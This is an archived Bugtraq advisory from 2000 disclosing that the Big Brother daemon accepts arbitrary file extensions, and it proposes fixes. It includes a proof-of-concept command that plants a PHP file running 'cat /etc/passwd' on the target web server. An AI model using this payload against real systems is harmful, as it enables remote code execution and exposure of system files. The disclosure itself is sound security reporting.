[15749] in bugtraq
Big Brother filename extension vulnerability
daemon@ATHENA.MIT.EDU (xternal)
Wed Jul 12 14:48:23 2000
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000711231139.6331.qmail@web2001.mail.yahoo.com>
Date: Tue, 11 Jul 2000 16:11:39 -0700
Reply-To: xternal <xternal1@YAHOO.COM>
From: xternal <xternal1@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
versions affected: bb14h2 (current) and older
exploit:
bbd listens for incoming connections on port 1984.
Using telnet or the bb client, it is possible to
connect and create a filename with an arbitrary
extension, as the extension is not rigorously checked.
As this file is droped into a directory accessible
via the web server, any file extension that is parsed
server side can be abused. For example:
./bb 1.2.3.4 "status evil.php3 <?<system(\"cat
/etc/passwd\");?>"
will allow viewing of the /etc/passwd upon browsing to
http://1.2.3.4/bb/logs/evil.php3.
solutions:
-Modify bbd.c to only allowed specified file
extensions(.disk, .proc ...)
-Implement access restrictions via
$BBHOME/etc/security to minimize exposure to
vulnerabilities. Unfortunately, the default install
doesn't enable the security file.
__________________________________________________
Do You Yahoo!?
Get Yahoo! Mail – Free email you can access from anywhere!
http://mail.yahoo.com/
